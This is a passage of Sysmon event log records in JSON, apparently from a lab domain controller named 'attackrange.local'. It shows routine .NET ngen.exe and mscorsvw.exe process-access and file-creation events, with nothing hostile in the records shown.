08:06:51.818","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-229B-5F25-0000-00105B171000}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8089,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:51.818\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-229B-5F25-0000-00105B171000}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:51.818","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-229B-5F25-0000-00105B171000}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8090,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:51.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-229B-5F25-0000-00105B171000}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:51.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-229B-5F25-0000-00105B171000}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8091,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:00.756\r\nProcessGuid: {41C8662E-229B-5F25-0000-00105B171000}\r\nProcessId: 172\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ac-0\\System.Web.dll\r\nCreationUtcTime: 2020-08-01 08:07:00.756","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:00.756","ProcessGuid":"{41C8662E-229B-5F25-0000-00105B171000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ac-0\\System.Web.dll","CreationUtcTime":"2020-08-01 08:07:00.756","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8092,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:00.990\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22A4-5F25-0000-00107B1F1000}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:00.990","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22A4-5F25-0000-00107B1F1000}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8093,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:00.990\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A4-5F25-0000-00107B1F1000}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:00.990","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A4-5F25-0000-00107B1F1000}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8094,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:00.990\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22A4-5F25-0000-00107B1F1000}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:00.990","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22A4-5F25-0000-00107B1F1000}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8095,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.053\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-001011241000}\r\nTargetProcessId: 2704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.053","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-001011241000}","TargetProcessId":"2704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8096,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.053\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-001011241000}\r\nTargetProcessId: 2704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.053","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-001011241000}","TargetProcessId":"2704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8097,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-001011241000}\r\nTargetProcessId: 2704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 